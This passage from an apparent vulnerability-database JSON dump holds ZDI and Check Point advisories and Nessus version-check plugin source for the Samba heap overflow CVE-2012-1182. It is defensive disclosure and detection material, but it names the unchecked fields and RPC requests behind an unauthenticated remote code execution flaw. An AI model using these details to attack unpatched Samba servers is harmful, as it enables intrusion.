Because there is no check to see if 'num_names' is smaller than 'names' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba lsa_LookupNames Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-070", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-070/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:07", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS INFO3 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. 
This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba ndr_pull_dfs_Info3 Heap Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-061", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-061/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T20:53:02", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within the way Samba handles SetInfoPolicy requests. When parsing the data sent in the request, Samba uses the field 'settings' to create a heap allocation but then uses another field, 'count', to write data to the allocation. 
Because there is no check to see if 'count' is smaller than 'settings' this could result in a heap buffer overflow that could lead to remote code execution.", "cvss3": {}, "published": "2012-04-18T00:00:00", "type": "zdi", "title": "Samba SetInfoPolicy AuditEventsInfo Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-18T00:00:00", "id": "ZDI-12-069", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-069/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:16:53", "description": "A heap overflow vulnerability has been reported in the Samba daemon. The vulnerability is due to an error in the PIDL auto-generated code in the LSA RPC service of the Samba daemon. Remote attackers could exploit this vulnerability by making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation that triggers a heap overflow. 
A successful exploitation of this vulnerability could execute arbitrary code with root privileges.", "cvss3": {}, "published": "2013-07-28T00:00:00", "type": "checkpoint_advisories", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow (CVE-2012-1182)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-12-29T00:00:00", "id": "CPAI-2013-2506", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-26T09:30:28", "description": "An out-of-bounds array access vulnerability has been reported in Samba. The vulnerability is due to an error in the RPC code generator, resulting in a heap memory corruption. A remote attacker can exploit this issue by sending specially crafted SMB traffic to an affected server. 
Successful exploitation could allow an attacker to execute arbitrary code in the security context of the logged-on user.", "cvss3": {}, "published": "2012-10-14T00:00:00", "type": "checkpoint_advisories", "title": "Samba DCE RPC IDL Parser Out-of-bounds Array Access (CVE-2012-1182)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-11-20T00:00:00", "id": "CPAI-2012-317", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:53:34", "description": "From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange servers using native protocols. Evolution-MAPI uses these libraries to integrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. 
(CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function. Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages, which fix these issues and add these enhancements.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : openchange (ELSA-2013-0515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:evolution-mapi", "p-cpe:/a:oracle:linux:evolution-mapi-devel", "p-cpe:/a:oracle:linux:openchange", "p-cpe:/a:oracle:linux:openchange-client", "p-cpe:/a:oracle:linux:openchange-devel", "p-cpe:/a:oracle:linux:openchange-devel-docs", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/68752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# Oracle Linux Security 
Advisory ELSA-2013-0515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68752);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"Oracle Linux 6 : openchange (ELSA-2013-0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. 
(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003302.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:48", "description": "Updated samba4 packages that fix one security issue, multiple bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. 
This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages, which fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat Enterprise Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-10T00:00:00", "type": "nessus", "title": "CentOS 6 : samba4 (CESA-2013:0506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba4", "p-cpe:/a:centos:centos:samba4-client", "p-cpe:/a:centos:centos:samba4-common", "p-cpe:/a:centos:centos:samba4-dc", "p-cpe:/a:centos:centos:samba4-dc-libs", "p-cpe:/a:centos:centos:samba4-devel", "p-cpe:/a:centos:centos:samba4-libs", "p-cpe:/a:centos:centos:samba4-pidl", "p-cpe:/a:centos:centos:samba4-python", "p-cpe:/a:centos:centos:samba4-swat", "p-cpe:/a:centos:centos:samba4-test", "p-cpe:/a:centos:centos:samba4-winbind", "p-cpe:/a:centos:centos:samba4-winbind-clients", "p-cpe:/a:centos:centos:samba4-winbind-krb5-locator", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/65141", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# CentOS Errata and Security Advisory 2013:0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65141);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"CentOS 6 : samba4 (CESA-2013:0506)\");\n 
script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. 
This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7fd5e17\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000689.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?189565c5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", 
reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:49:24", "description": "Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond of allocated array. 
